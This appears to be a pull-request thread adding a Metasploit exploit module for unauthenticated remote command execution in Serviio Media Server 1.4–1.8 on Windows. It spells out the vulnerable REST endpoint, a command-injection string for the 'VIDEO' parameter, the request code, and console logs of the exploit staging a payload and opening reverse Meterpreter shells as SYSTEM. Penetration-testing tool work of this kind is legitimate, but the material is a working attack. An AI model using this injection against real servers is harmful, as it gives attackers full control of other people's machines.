Add Serviio Media Server checkStreamUrl Command Execution

[bcoles]

This PR adds an exploit module for Serviio Media Server.

This module exploits an unauthenticated remote command execution vulnerability
in the console component of Serviio Media Server versions 1.4 to 1.8 on
Windows operating systems.

The console service (on port 23423 by default) exposes a REST API which
which does not require authentication.

The 'action' API endpoint does not sufficiently sanitize user-supplied data
in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is
used in a call to cmd.exe resulting in execution of arbitrary commands.

This module has been tested successfully on Serviio Media Server versions
1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.

Documentation

To follow; when I feel like it.

Verification

• Start msfconsole
• use exploit/windows/http/serviio_checkstreamurl_cmd_exec
• check
• Verify the check method returns Unknown if the connection to the target server fails.
• Verify the check method returns Appears if the target server is Serviio version 1.4 to 1.8 on Windows.
• Verify the check method returns Safe if the target server is not Serviio version 1.4 to 1.8 on Windows.
• run
• Verify you get a shell.

Output

msf > use exploit/windows/http/serviio_checkstreamurl_cmd_exec 
msf exploit(serviio_checkstreamurl_cmd_exec) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(serviio_checkstreamurl_cmd_exec) > check
[*] 172.16.191.166:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > set verbose true
verbose => true
msf exploit(serviio_checkstreamurl_cmd_exec) > check

[*] 172.16.191.166:23423 Serviio Media Server version 1.8
[*] 172.16.191.166:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > run

[*] Started reverse TCP handler on 172.16.191.181:4444 
[*] Serviio Media Server version 1.8
[*] Command Stager progress -   7.95% done (7999/100636 bytes)
[*] Command Stager progress -  15.90% done (15998/100636 bytes)
[*] Command Stager progress -  23.85% done (23997/100636 bytes)
[*] Command Stager progress -  31.79% done (31996/100636 bytes)
[*] Command Stager progress -  39.74% done (39995/100636 bytes)
[*] Command Stager progress -  47.69% done (47994/100636 bytes)
[*] Command Stager progress -  55.64% done (55993/100636 bytes)
[*] Command Stager progress -  63.59% done (63992/100636 bytes)
[*] Command Stager progress -  71.54% done (71991/100636 bytes)
[*] Command Stager progress -  79.48% done (79990/100636 bytes)
[*] Command Stager progress -  87.43% done (87989/100636 bytes)
[*] Command Stager progress -  95.38% done (95988/100636 bytes)
[*] Sending stage (957487 bytes) to 172.16.191.166
[*] Command Stager progress - 100.00% done (100636/100636 bytes)
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.166:58474) at 2017-05-05 02:49:39 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd 
C:\Program Files\Serviio\bin

[mdisec]

Formatting suggestions.

    json = {
      'name'      => 'checkStreamUrl',
      'parameter' => ['VIDEO', "\" &#{cmd}&"]
    }.to_json

[bcoles]

No thanks

[bcoles]

Symmetrical style hash brace layout as per Rubocop MultilineHashBraceLayout in lieu of a Metasploit style guide.

However the .to_json call should probably be moved inside the send_request_uri method. I've fixed this.

[mdisec]

Yet another formatting suggestion.

send_request_cgi(
  'uri'    => normalize_uri(target_uri.path, 'rest', 'action'),
  'method' => 'POST',
  'ctype'  => 'application/json',
  'data'   => json
)

[bcoles]

No thanks

[bcoles]

Symmetrical style method call brace layout as per Rubocop MultilineMethodCallBraceLayout in lieu of a Metasploit style guide.

[mdisec]

I believe you may want to use Failure::NotVulnerable instead of Failure::NoTarget.

[bcoles]

Fixed

[wchen-r7]

Testing...

[wchen-r7]

Flawless victory:

msf exploit(serviio_checkstreamurl_cmd_exec) > check
[*] 192.168.146.171:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Command Stager progress -   7.95% done (7999/100636 bytes)
[*] Command Stager progress -  15.90% done (15998/100636 bytes)
[*] Command Stager progress -  23.85% done (23997/100636 bytes)
[*] Command Stager progress -  31.79% done (31996/100636 bytes)
[*] Command Stager progress -  39.74% done (39995/100636 bytes)
[*] Command Stager progress -  47.69% done (47994/100636 bytes)
[*] Command Stager progress -  55.64% done (55993/100636 bytes)
[*] Command Stager progress -  63.59% done (63992/100636 bytes)
[*] Command Stager progress -  71.54% done (71991/100636 bytes)
[*] Command Stager progress -  79.48% done (79990/100636 bytes)
[*] Command Stager progress -  87.43% done (87989/100636 bytes)
[*] Command Stager progress -  95.38% done (95988/100636 bytes)
[*] Sending stage (957487 bytes) to 192.168.146.171
[*] Command Stager progress - 100.00% done (100636/100636 bytes)
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.171:49186) at 2017-05-16 16:17:37 -0500

meterpreter > 

[wchen-r7]

Release Notes

The exploits/windows/http/serviio_checkstreamurl_cmd_exec module has been added to the framework. It exploits a vulnerability in Serviio Media Server. Serviio is a free media server that allows you stream video, audio, and images. The console service in Serviio exposes a REST API that allows a remote user to execute system commands, which can be abused to gain arbitrary remote code execution under the context of SYSTEM (on Windows).